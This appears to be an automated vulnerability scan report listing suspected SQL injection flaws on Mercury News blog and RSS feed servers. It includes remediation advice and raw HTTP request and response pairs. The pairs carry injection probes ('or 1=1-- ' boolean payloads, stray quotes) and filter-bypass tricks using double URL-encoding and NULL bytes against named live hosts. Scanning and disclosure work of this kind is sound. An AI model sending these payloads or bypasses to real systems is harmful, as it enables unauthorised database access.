SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /aei/2010/12%2527/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:12:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:12:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content- ...[SNIP]...
Request 2
GET /aei/2010/12%2527%2527/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!-- Page not cached by WP Super Cache. No closing HTML tag. Check your theme. -->
1.2. http://blogs.mercurynews.com/aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 53405733%20or%201%3d1--%20 and 53405733%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/?153405733%20or%201%3d1--%20=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:09:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:09:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Database Error</title>
</head> <body> <h1>Error establishing a database connection</h1> </body> </html>
Request 2
GET /aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/?153405733%20or%201%3d2--%20=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Charlie Brown vs. The Grinch; Round 3 of our Holiday TV Tourney has started; Vote now! | A+E Interactive</title>
<meta name="generator" content="WordPress" /> <link rel="alternate" type="application/rss+xml" title="A+E Interactive » Charlie Brown vs. The Grinch; Round 3 of our Holiday TV Tourney has started; Vote now! Comments Feed" href="http://blogs.mercurynews.com/aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/feed/" /> <link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://blogs.mercurynews.com/aei/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://blogs.mercurynews.com/aei/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://blogs.mercurynews.com/aei/wp-includes/wlwmanifest.xml" /> <link rel='index' title='A+E Interactive' href='http://blogs.mercurynews.com/aei' /> <link rel='start' title='A massive mea culpa and apology for a bad Mass Effect review' href='http://blogs.mercurynews.com/aei/2008/01/01/a_massive_mea_culpa_and_apology_for_a_bad_mass_effect_review/' /> <link rel='prev' title='Review: Leonard Cohen in Oakland' href='http://blogs.mercurynews.com/aei/2010/12/07/review-leonard-cohen-in-oakland/' /> <meta name="generator" content="WordPress 2.8.4" /> <meta name="descrip ...[SNIP]...
1.3. http://blogs.mercurynews.com/extrabaggs/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://blogs.mercurynews.com
Path: /extrabaggs/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /extrabaggs/?1%00'=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:08:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:08:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content- ...[SNIP]...
Request 2
GET /extrabaggs/?1%00''=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /extrabaggs/2010'/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:12:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:12:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content- ...[SNIP]...
Request 2
GET /extrabaggs/2010''/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /extrabaggs/2010'/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/feed/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:12:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:12:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content- ...[SNIP]...
Request 2
GET /extrabaggs/2010''/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/feed/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /kawakami%2527/?p=9831 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:13:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:13:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content- ...[SNIP]...
Request 2
GET /kawakami%2527%2527/?p=9831 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Date: Tue, 07 Dec 2010 23:13:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:13:15 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 7611
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org ...[SNIP]...
1.7. http://blogs.mercurynews.com/sharks/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://blogs.mercurynews.com
Path: /sharks/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /sharks/?1%2527=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:09:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:09:07 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content- ...[SNIP]...
Request 2
GET /sharks/?1%2527%2527=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http:// ...[SNIP]...
1.8. http://blogs.mercurynews.com/sharks/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://blogs.mercurynews.com
Path: /sharks/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /sharks/?p=4471&1%20and%201%3d1--%20=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:11:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:11:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Database Error</title>
</head> <body> <h1>Error establishing a database connection</h1> </body> </html>
Request 2
GET /sharks/?p=4471&1%20and%201%3d2--%20=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Which goalie gets the start against Flyers? Maybe not as easy a call after 5-2 victory over Red Wings | Working the Corners</title>
<meta name="generator" content="WordPress" /> <link rel="alternate" type="application/rss+xml" title="Working the Corners » Which goalie gets the start against Flyers? Maybe not as easy a call after 5-2 victory over Red Wings Comments Feed" href="http://blogs.mercurynews.com/sharks/2010/12/07/so-which-goalie-gets-the-start-against-flyers-may-not-be-an-easy-call-after-win-over-red-wings/feed/" /> <link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://blogs.mercurynews.com/sharks/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://blogs.mercurynews.com/sharks/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://blogs.mercurynews.com/sharks/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Working the Corners' href='http://blogs.mercurynews.com/sharks' /> <link rel='start' title='Finding teal connections in Prague' href='http://blogs.mercurynews.com/sharks/2007/09/24/finding-teal-connections-in-prague/' /> <link rel='prev' title='Talk about your turnaround — Sharks get revenge against Detroit, but coach still unhappy over start' href='http://blogs.mercurynews.com/sharks/2010/12/06/4464/' /> ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /warriors/?p=1744 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http:// ...[SNIP]... e things and, in fact, you can usually get signals that the coach is if he sits a player, other than to rest. Our lack of depth, especially a guard, makes that tough to do. But Smart does it when the errors are too much to ignore. Listen to “neutral” announcers in nationally telecast games or sometimes even in the other team’s feed, if you get a half-way honest announcer. You’ll ...[SNIP]...
Request 2
GET /warriors/?p=1744 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:13:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:13:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content- ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200125.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:18:26 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200125.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:26 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200222.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:07 GMT
Date: Tue, 07 Dec 2010 23:20:07 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200222.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:08 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 67192433%20or%201%3d1--%20 and 67192433%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56867192433%20or%201%3d1--%20/200222.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:18 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56867192433%20or%201%3d2--%20/200222.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:19 GMT
Connection: close
